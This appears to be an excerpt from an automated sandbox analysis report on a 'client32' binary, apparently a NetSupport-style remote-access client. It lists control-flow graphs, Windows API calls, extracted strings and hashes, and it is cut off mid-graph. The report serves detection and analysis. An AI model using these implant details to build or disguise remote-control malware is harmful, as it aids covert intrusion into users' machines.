                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1124 1102d560-1102d5b0 call 1110c4b0 1127 1102d5b2-1102d5c6 call 1113ee00 1124->1127 1128 1102d5c8 1124->1128 1130 1102d5ce-1102d613 call 1113e630 call 1113ee60 1127->1130 1128->1130 1136 1102d7b3-1102d7c2 call 11141160 1130->1136 1137 1102d619 1130->1137 1143 1102d7c8-1102d7d8 1136->1143 1139 1102d620-1102d623 1137->1139 1141 1102d625-1102d627 1139->1141 1142 1102d648-1102d651 1139->1142 1144 1102d630-1102d641 1141->1144 1145 1102d657-1102d65e 1142->1145 1146 1102d784-1102d79d call 1113ee60 1142->1146 1147 1102d7da 1143->1147 1148 1102d7df-1102d7f3 call 1102c800 1143->1148 1144->1144 1149 1102d643 1144->1149 1145->1146 1150 1102d753-1102d768 call 1115f4c7 1145->1150 1151 1102d665-1102d667 1145->1151 1152 1102d76a-1102d77f call 1115f4c7 1145->1152 1153 1102d6fa-1102d72d call 1115dfa1 call 1113e630 1145->1153 1154 1102d73b-1102d751 call 111606a0 1145->1154 1155 1102d6eb-1102d6f5 1145->1155 1156 1102d72f-1102d739 1145->1156 1157 1102d6ac-1102d6b2 1145->1157 1158 1102d6dc-1102d6e6 1145->1158 1146->1139 1176 1102d7a3-1102d7a5 1146->1176 1147->1148 1172 1102d7f8-1102d7fd 1148->1172 1149->1146 1150->1146 1151->1146 1163 1102d66d-1102d6a7 call 1115dfa1 call 1113e630 call 1102c800 1151->1163 1152->1146 1153->1146 1154->1146 1155->1146 1156->1146 1165 1102d6b4-1102d6c8 call 1115f4c7 1157->1165 1166 1102d6cd-1102d6d7 1157->1166 1158->1146 1163->1146 1165->1146 1166->1146 1178 1102d8a3-1102d8bd call 11142710 1172->1178 1181 1102d803-1102d828 call 110b69b0 call 11142790 1172->1181 1176->1178 1179 1102d7ab-1102d7b1 1176->1179 1193 1102d913-1102d91f call 1102b0f0 1178->1193 1194 1102d8bf-1102d8d8 call 1105d350 1178->1194 1179->1136 1179->1143 1200 1102d833-1102d839 1181->1200 1201 1102d82a-1102d831 1181->1201 1204 1102d921-1102d928 1193->1204 1205 1102d8f8-1102d8ff 1193->1205 1194->1193 1203 1102d8da-1102d8ec 1194->1203 1206 1102d83b-1102d842 call 110279a0 1200->1206 1207 1102d899 1200->1207 1201->1178 1203->1193 1220 1102d8ee 1203->1220 1209 1102d905-1102d908 1204->1209 1211 1102d92a-1102d934 1204->1211 1205->1209 1210 1102db0a-1102db2b GetComputerNameA 1205->1210 1206->1207 1219 1102d844-1102d876 1206->1219 1207->1178 1216 1102d90a-1102d911 call 110b69b0 1209->1216 1217 1102d939 1209->1217 1213 1102db63-1102db69 1210->1213 1214 1102db2d-1102db61 call 11027870 1210->1214 1211->1210 1222 1102db6b-1102db70 1213->1222 1223 1102db9f-1102dbb2 call 111606a0 1213->1223 1214->1213 1243 1102dbb7-1102dbc3 1214->1243 1218 1102d93c-1102da16 call 110274f0 call 11027820 call 110274f0 * 2 LoadLibraryA GetProcAddress 1216->1218 1217->1218 1272 1102dada-1102dae2 SetLastError 1218->1272 1273 1102da1c-1102da33 1218->1273 1236 1102d880-1102d88f call 110f3d00 1219->1236 1237 1102d878-1102d87e 1219->1237 1220->1205 1226 1102db76-1102db7a 1222->1226 1242 1102dda7-1102ddca 1223->1242 1233 1102db96-1102db98 1226->1233 1234 1102db7c-1102db7e 1226->1234 1241 1102db9b-1102db9d 1233->1241 1239 1102db92-1102db94 1234->1239 1240 1102db80-1102db86 1234->1240 1245 1102d892-1102d894 call 1102cd90 1236->1245 1237->1236 1237->1245 1239->1241 1240->1233 1247 1102db88-1102db90 1240->1247 1241->1223 1241->1243 1257 1102ddf2-1102ddfa 1242->1257 1258 1102ddcc-1102ddd2 1242->1258 1252 1102dbc5-1102dbda call 110b69b0 call 11029840 1243->1252 1253 1102dbdc-1102dbef call 11080b80 1243->1253 1245->1207 1247->1226 1247->1239 1279 1102dc33-1102dc4c call 11080b80 1252->1279 1269 1102dbf1-1102dc14 1253->1269 1270 1102dc16-1102dc18 1253->1270 1261 1102de0c-1102de98 call 1115dfa1 * 2 call 11142790 * 2 GetCurrentProcessId call 110eba70 call 110278d0 call 11142790 call 1115e3e1 1257->1261 1262 1102ddfc-1102de09 call 11035740 call 1115dfa1 1257->1262 1258->1257 1260 1102ddd4-1102dded call 1102cd90 1258->1260 1260->1257 1262->1261 1269->1279 1271 1102dc20-1102dc31 1270->1271 1271->1271 1271->1279 1283 1102daa3-1102daaf 1272->1283 1273->1283 1294 1102da35-1102da3e 1273->1294 1297 1102dc52-1102dccd call 11142790 call 110cd7e0 call 110cf040 call 110b69b0 wsprintfA call 110b69b0 wsprintfA 1279->1297 1298 1102dd8c-1102dd99 call 111606a0 1279->1298 1286 1102daf2-1102db01 1283->1286 1287 1102dab1-1102dabd 1283->1287 1286->1210 1290 1102db03-1102db04 FreeLibrary 1286->1290 1292 1102dacf-1102dad3 1287->1292 1293 1102dabf-1102dacd GetProcAddress 1287->1293 1290->1210 1300 1102dae4-1102dae6 SetLastError 1292->1300 1301 1102dad5-1102dad8 1292->1301 1293->1292 1294->1283 1299 1102da40-1102da76 call 11142790 call 11128460 1294->1299 1336 1102dce3-1102dcf9 call 111260b0 1297->1336 1337 1102dccf-1102dcde call 110290c0 1297->1337 1315 1102dd9c-1102dda1 CharUpperA 1298->1315 1299->1283 1319 1102da78-1102da9e call 11142790 call 11027530 1299->1319 1302 1102daec 1300->1302 1301->1302 1302->1286 1315->1242 1319->1283 1341 1102dd12-1102dd4c call 110ce790 * 2 1336->1341 1342 1102dcfb-1102dd0d call 110ce790 1336->1342 1337->1336 1349 1102dd62-1102dd8a call 111606a0 call 110ce380 1341->1349 1350 1102dd4e-1102dd5d call 110290c0 1341->1350 1342->1341 1349->1315 1350->1349
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _malloc_memsetwsprintf
                                                                                                                  • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$11/09/15 09:21:05 V12.10F2$494126$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                  • API String ID: 3802068140-1759247563
                                                                                                                  • Opcode ID: a8c1789ade1027bfc11a95fffc2dd2e3d9204dc5bbfbfc96940aeedc525a177a
                                                                                                                  • Instruction ID: d240301f554d32d3b7904e5f3cd70c9da08142028b12ad4ce6a05654279abd09
                                                                                                                  • Opcode Fuzzy Hash: a8c1789ade1027bfc11a95fffc2dd2e3d9204dc5bbfbfc96940aeedc525a177a
                                                                                                                  • Instruction Fuzzy Hash: B132D675D0026A9FDB12DF94CC84BEDF7B9AB44308F8445E9E958A7280EB706E44CF61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1776 6bec3d00-6bec3d42 call 6bed1c50 call 6bec3b80 1780 6bec3d47-6bec3d4f 1776->1780 1781 6bec3d6c-6bec3d6e 1780->1781 1782 6bec3d51-6bec3d6b call 6bed28e1 1780->1782 1784 6bec3d87-6bec3da1 call 6beb8fb0 1781->1784 1785 6bec3d70-6bec3d84 call 6beb6f50 1781->1785 1791 6bec3dc5-6bec3e44 call 6beb5e90 * 2 call 6bec7be0 call 6beb5e20 lstrlenA 1784->1791 1792 6bec3da3-6bec3dc4 call 6beb63c0 call 6bed28e1 1784->1792 1785->1784 1805 6bec3e98-6bec3fbe call 6beb5500 call 6beb6050 call 6bec7c70 * 2 call 6bec7d00 * 3 call 6beb5060 call 6bec7d00 call 6bed1bfd call 6bec7d00 gethostname call 6bec7d00 call 6bebb8e0 1791->1805 1806 6bec3e46-6bec3e95 call 6becd8b0 call 6beb5060 call 6beb4830 call 6bed1bfd 1791->1806 1841 6bec3fc5-6bec3fe1 call 6bec7d00 1805->1841 1842 6bec3fc0 1805->1842 1806->1805 1845 6bec3ff8-6bec3ffe 1841->1845 1846 6bec3fe3-6bec3ff5 call 6bec7d00 1841->1846 1842->1841 1848 6bec421a-6bec4263 call 6bec7b60 call 6bed1bfd call 6beb98d0 call 6bec77e0 1845->1848 1849 6bec4004-6bec4022 call 6beb5e20 1845->1849 1846->1845 1877 6bec4265-6bec4291 call 6beba4e0 call 6bed28e1 1848->1877 1878 6bec4292-6bec42aa call 6bed28e1 1848->1878 1855 6bec405a-6bec4084 call 6beb5e20 1849->1855 1856 6bec4024-6bec4057 call 6beb5060 call 6bec7d00 call 6bed1bfd 1849->1856 1866 6bec408a-6bec41ce call 6beb5060 call 6bec7d00 call 6bed1bfd call 6beb5e20 call 6beb5060 call 6bec7d00 call 6bed1bfd call 6beb5e20 call 6beb5060 call 6bec7d00 call 6bed1bfd call 6beb5e20 call 6beb5060 call 6bec7d00 call 6bed1bfd 1855->1866 1867 6bec41d1-6bec4217 call 6bec7d00 call 6beb5e20 call 6bec7d00 1855->1867 1856->1855 1866->1867 1867->1848
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset
                                                                                                                  • String ID: *Dept$*Gsk$1.1$494126$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                  • API String ID: 2102423945-1017439714
                                                                                                                  • Opcode ID: 0b133566f8baf5b84f14fb9d21d8f573223191e29a49831b03a67a36d44188f0
                                                                                                                  • Instruction ID: ae0538dbceaa9ff161e28677e08bb2b25797dc1bc535e7c2a78fbd1eef3d188f
                                                                                                                  • Opcode Fuzzy Hash: 0b133566f8baf5b84f14fb9d21d8f573223191e29a49831b03a67a36d44188f0
                                                                                                                  • Instruction Fuzzy Hash: D8E1B2B2C0022C6ACB21DBB0DD91EEFB77C9F59305F2045C9E51962141DB79AB858FB2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB63C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2598 6beb63c0-6beb6402 call 6bed4710 EnterCriticalSection InterlockedDecrement 2601 6beb6408-6beb641f EnterCriticalSection 2598->2601 2602 6beb65ed-6beb6608 LeaveCriticalSection call 6bed28e1 2598->2602 2604 6beb64da-6beb64e0 2601->2604 2605 6beb6425-6beb6431 2601->2605 2609 6beb65bd-6beb65e8 call 6bed1c50 LeaveCriticalSection 2604->2609 2610 6beb64e6-6beb64f0 shutdown 2604->2610 2607 6beb6443-6beb6447 2605->2607 2608 6beb6433-6beb6441 GetProcAddress 2605->2608 2614 6beb6449-6beb644c 2607->2614 2615 6beb644e-6beb6450 SetLastError 2607->2615 2608->2607 2609->2602 2611 6beb650a-6beb652d timeGetTime #16 2610->2611 2612 6beb64f2-6beb6507 GetLastError call 6beb30a0 2610->2612 2618 6beb652f 2611->2618 2619 6beb656c-6beb656e 2611->2619 2612->2611 2616 6beb6456-6beb6465 2614->2616 2615->2616 2621 6beb6477-6beb647b 2616->2621 2622 6beb6467-6beb6475 GetProcAddress 2616->2622 2624 6beb6551-6beb656a #16 2618->2624 2625 6beb6531 2618->2625 2626 6beb6570-6beb657b closesocket 2619->2626 2628 6beb647d-6beb6480 2621->2628 2629 6beb6482-6beb6484 SetLastError 2621->2629 2622->2621 2624->2618 2624->2619 2625->2624 2630 6beb6533-6beb653e GetLastError 2625->2630 2631 6beb657d-6beb658a WSAGetLastError 2626->2631 2632 6beb65b6 2626->2632 2633 6beb648a-6beb6499 2628->2633 2629->2633 2630->2619 2634 6beb6540-6beb6547 timeGetTime 2630->2634 2635 6beb658c-6beb658e Sleep 2631->2635 2636 6beb6594-6beb6598 2631->2636 2632->2609 2638 6beb64ab-6beb64af 2633->2638 2639 6beb649b-6beb64a9 GetProcAddress 2633->2639 2634->2619 2640 6beb6549-6beb654b Sleep 2634->2640 2635->2636 2636->2626 2641 6beb659a-6beb659c 2636->2641 2643 6beb64c3-6beb64d5 SetLastError 2638->2643 2644 6beb64b1-6beb64be 2638->2644 2639->2638 2640->2624 2641->2632 2642 6beb659e-6beb65b3 GetLastError call 6beb30a0 2641->2642 2642->2632 2643->2609 2644->2609
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB63E8
                                                                                                                  • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6BEB63FA
                                                                                                                  • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6412
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6BEB643B
                                                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6450
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6BEB646F
                                                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6484
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6BEB64A3
                                                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6BEBD77B,00000000), ref: 6BEB64C5
                                                                                                                  • shutdown.WSOCK32(?,00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB64E9
                                                                                                                  • GetLastError.KERNEL32(?,00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB64F2
                                                                                                                  • timeGetTime.WINMM(?,00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6510
                                                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6526
                                                                                                                  • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6533
                                                                                                                  • timeGetTime.WINMM(?,00000000,?,6BEBD77B,00000000), ref: 6BEB6540
                                                                                                                  • Sleep.KERNEL32(00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB654B
                                                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6563
                                                                                                                  • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6574
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB657D
                                                                                                                  • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB658E
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB659E
                                                                                                                  • _memset.LIBCMT ref: 6BEB65C8
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,6BEBD77B,00000000), ref: 6BEB65D7
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898,?,00000000,?,6BEBD77B,00000000), ref: 6BEB65F2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                  • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                  • API String ID: 3764039262-2631155478
                                                                                                                  • Opcode ID: a5eac8150d051d71b98cdad275865d70eb9b202bc7a5642a6bd86c2e7b1f4933
                                                                                                                  • Instruction ID: 6fee7502d1e7052f2f6bdd6ec50c4a7f38af690b6ad0750645df1517bd54db0e
                                                                                                                  • Opcode Fuzzy Hash: a5eac8150d051d71b98cdad275865d70eb9b202bc7a5642a6bd86c2e7b1f4933
                                                                                                                  • Instruction Fuzzy Hash: 93519171A407009FDB10DFA8DD85F56B3BDBF89318F200958E50AD7281EBB8E995CB61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2648 6beb98d0-6beb9932 2649 6beb9956-6beb995e 2648->2649 2650 6beb9934-6beb9955 call 6beb30a0 call 6bed28e1 2648->2650 2652 6beb9ac5-6beb9acc 2649->2652 2653 6beb9964-6beb9979 call 6bed28f0 2649->2653 2655 6beb9b19-6beb9b1d 2652->2655 2656 6beb9ace-6beb9adb 2652->2656 2653->2652 2666 6beb997f-6beb9994 call 6bed4330 2653->2666 2661 6beb9b4b-6beb9b70 GetTickCount InterlockedExchange EnterCriticalSection 2655->2661 2662 6beb9b1f-6beb9b26 2655->2662 2659 6beb9af8-6beb9b07 wsprintfA 2656->2659 2660 6beb9add-6beb9af6 wsprintfA 2656->2660 2667 6beb9b0a-6beb9b16 call 6beb52b0 2659->2667 2660->2667 2664 6beb9b9c-6beb9ba1 2661->2664 2665 6beb9b72-6beb9b9b LeaveCriticalSection call 6beb30a0 call 6bed28e1 2661->2665 2662->2661 2668 6beb9b28-6beb9b41 call 6beb77b0 2662->2668 2672 6beb9bfb-6beb9c05 2664->2672 2673 6beb9ba3-6beb9bd0 call 6beb4dd0 2664->2673 2666->2652 2684 6beb999a-6beb99af call 6bed28f0 2666->2684 2667->2655 2668->2661 2689 6beb9b43-6beb9b45 2668->2689 2680 6beb9c3b-6beb9c47 2672->2680 2681 6beb9c07-6beb9c17 2672->2681 2696 6beb9d4b-6beb9d6c LeaveCriticalSection call 6bec77e0 2673->2696 2697 6beb9bd6-6beb9bf6 WSAGetLastError call 6beb30a0 2673->2697 2685 6beb9c50-6beb9c5a 2680->2685 2687 6beb9c19-6beb9c1d 2681->2687 2688 6beb9c20-6beb9c22 2681->2688 2684->2652 2706 6beb99b5-6beb99f1 2684->2706 2694 6beb9d2e-6beb9d3b call 6beb30a0 2685->2694 2695 6beb9c60-6beb9c65 2685->2695 2687->2688 2690 6beb9c1f 2687->2690 2688->2680 2691 6beb9c24-6beb9c36 call 6beb46c0 2688->2691 2689->2661 2690->2688 2691->2680 2712 6beb9d45 2694->2712 2701 6beb9c71-6beb9c9a send 2695->2701 2702 6beb9c67-6beb9c6b 2695->2702 2716 6beb9d78-6beb9d8a call 6bed28e1 2696->2716 2717 6beb9d6e-6beb9d72 InterlockedIncrement 2696->2717 2697->2696 2707 6beb9c9c-6beb9c9f 2701->2707 2708 6beb9cf1-6beb9d0f call 6beb30a0 2701->2708 2702->2694 2702->2701 2713 6beb99f7-6beb99ff 2706->2713 2714 6beb9cbe-6beb9cce WSAGetLastError 2707->2714 2715 6beb9ca1-6beb9cac 2707->2715 2708->2712 2712->2696 2719 6beb9aa3-6beb9ac2 call 6beb30a0 2713->2719 2720 6beb9a05-6beb9a08 2713->2720 2722 6beb9d11-6beb9d2c call 6beb30a0 2714->2722 2723 6beb9cd0-6beb9ce9 timeGetTime Sleep 2714->2723 2715->2712 2721 6beb9cb2-6beb9cbc 2715->2721 2717->2716 2719->2652 2727 6beb9a0a-6beb9a0c 2720->2727 2728 6beb9a0e 2720->2728 2721->2723 2722->2712 2723->2685 2729 6beb9cef 2723->2729 2733 6beb9a14-6beb9a1d 2727->2733 2728->2733 2729->2712 2734 6beb9a1f-6beb9a22 2733->2734 2735 6beb9a8d-6beb9a8e 2733->2735 2736 6beb9a26-6beb9a35 2734->2736 2737 6beb9a24 2734->2737 2735->2719 2738 6beb9a90-6beb9a93 2736->2738 2739 6beb9a37-6beb9a3a 2736->2739 2737->2736 2742 6beb9a9d 2738->2742 2740 6beb9a3e-6beb9a4d 2739->2740 2741 6beb9a3c 2739->2741 2743 6beb9a4f-6beb9a52 2740->2743 2744 6beb9a95-6beb9a98 2740->2744 2741->2740 2742->2719 2745 6beb9a56-6beb9a65 2743->2745 2746 6beb9a54 2743->2746 2744->2742 2747 6beb9a9a 2745->2747 2748 6beb9a67-6beb9a6a 2745->2748 2746->2745 2747->2742 2749 6beb9a6e-6beb9a85 2748->2749 2750 6beb9a6c 2748->2750 2749->2713 2751 6beb9a8b 2749->2751 2750->2749 2751->2719
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _strncmp
                                                                                                                  • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                  • API String ID: 909875538-2848211065
                                                                                                                  • Opcode ID: f759bee8d0be814c10bd4b82937134861f8a45e76a22ae2b4a9e4587a5e6b970
                                                                                                                  • Instruction ID: 255dddd7419939c8f6f7f14ea74b68e100bade5c4eb3454d40cbe1863319f058
                                                                                                                  • Opcode Fuzzy Hash: f759bee8d0be814c10bd4b82937134861f8a45e76a22ae2b4a9e4587a5e6b970
                                                                                                                  • Instruction Fuzzy Hash: 6CD10575A042199FDB20CF64DD81BD9B7B8AF6A308F2041D9D80D9B342D739D985CF92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2942 6bec6ba0-6bec6c14 call 6bed4710 call 6beb5e90 GetTickCount call 6bec9210 2949 6bec6fb9-6bec6fc9 call 6bed28e1 2942->2949 2950 6bec6c1a-6bec6c1c 2942->2950 2952 6bec6c26-6bec6c33 GetTickCount 2950->2952 2954 6bec6c35-6bec6c3d call 6bec6940 2952->2954 2955 6bec6c42-6bec6c49 2952->2955 2954->2955 2957 6bec6c4b call 6beb97c0 2955->2957 2958 6bec6c50-6bec6c57 2955->2958 2957->2958 2960 6bec6c59-6bec6c61 Sleep 2958->2960 2961 6bec6c66-6bec6c6d 2958->2961 2964 6bec6f97-6bec6f9e 2960->2964 2962 6bec6c6f-6bec6c7c WaitForSingleObject 2961->2962 2963 6bec6c82-6bec6cc2 call 6bed3c10 select 2961->2963 2962->2963 2966 6bec6fa4-6bec6fb6 call 6bed28e1 2963->2966 2971 6bec6cc8-6bec6ccb 2963->2971 2964->2966 2967 6bec6c20 2964->2967 2967->2952 2972 6bec6ccd-6bec6cdf Sleep 2971->2972 2973 6bec6ce4-6bec6ce6 2971->2973 2972->2964 2973->2952 2974 6bec6cec-6bec6cf9 GetTickCount 2973->2974 2975 6bec6d00-6bec6d1c 2974->2975 2976 6bec6f89-6bec6f91 2975->2976 2977 6bec6d22 2975->2977 2976->2964 2976->2975 2978 6bec6d28-6bec6d2b 2977->2978 2979 6bec6d3d-6bec6d45 2978->2979 2980 6bec6d2d-6bec6d36 2978->2980 2979->2976 2982 6bec6d4b-6bec6d95 call 6bed3753 call 6beb5c90 2979->2982 2980->2978 2981 6bec6d38 2980->2981 2981->2976 2987 6bec6f4f-6bec6f7c GetTickCount InterlockedExchange call 6bec77e0 2982->2987 2988 6bec6d9b 2982->2988 2987->2964 2994 6bec6f7e-6bec6f83 2987->2994 2989 